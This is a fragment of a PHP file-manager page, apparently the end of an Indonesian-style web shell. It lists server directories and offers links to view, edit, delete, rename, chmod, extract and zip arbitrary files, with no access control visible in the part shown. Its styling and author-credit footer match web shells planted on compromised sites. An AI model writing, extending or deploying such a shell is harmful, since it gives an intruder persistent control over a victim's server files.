$full_item_path = $path.DIRECTORY_SEPARATOR.$item;
$encoded_full_item_path = urlencode($full_item_path);
echo "<tr><td class='td_home'>";
if ($item != '..') echo "<input type='checkbox' class='file-checkbox' name='selected_files[]' value='".htmlspecialchars($full_item_path)."'>";
echo "</td><td class='td_home' style='word-break:break-all;'>";
if($item == '..') echo "<i class='fas fa-folder-open'></i> <a href=\"?path=".urlencode(dirname($path))."\">".htmlspecialchars($item)."</a>";
elseif(is_dir($full_item_path)) echo "<i class='fas fa-folder'></i> <a href=\"?path=$encoded_full_item_path\">".htmlspecialchars($item)."</a>";
else echo "<i class='fas fa-file'></i> <a href=\"?action=view_file&target_file=$encoded_full_item_path&path=".urlencode($path)."\">".htmlspecialchars($item)."</a>";
echo "</td><td class='td_home'>".(is_file($full_item_path) ? round(@filesize($full_item_path)/1024,2).' KB' : '--')."</td>";
echo "<td class='td_home'><font color='".(is_writable($full_item_path) ? '#57FF00' : (!is_readable($full_item_path) ? '#FF0004' : $theme_fg))."'>".perms($full_item_path)."</font></td>";
echo "<td class='td_home'><select style='width:100%;' onchange=\"if(this.value) window.location.href='?action='+this.value+'&target_file={$encoded_full_item_path}&path=".urlencode($path)."'\"><option value=''>Action</option><option value='delete'>Delete</option>";
if(is_file($full_item_path)) { echo "<option value='edit_form'>Edit</option>"; if(class_exists('ZipArchive') && pathinfo($full_item_path, PATHINFO_EXTENSION) == 'zip') echo "<option value='extract_form'>Extract</option>"; }
echo "<option value='rename_form'>Rename</option><option value='chmod_form'>Chmod</option></select></td></tr>";
}
} else { echo "<tr><td colspan='5' style='text-align:center;'><font color='red'>Gagal membaca direktori.</font></td></tr>"; }
if (class_exists('ZipArchive')) {
echo '<tfoot><tr class="first"><td colspan="5">With selected: <select name="bulk_action"><option value="">Choose...</option><option value="zip_selected">Zip</option></select> <input type="submit" value="Go"></td></tr></tfoot>';
}
echo '</table></div></form>';
}
?>
<hr>
<footer>
<font size="2px"><b>Coded With 💗 by <b><?php echo htmlspecialchars($author); ?></b></b></font>
</footer>
</div>
</body>
</html>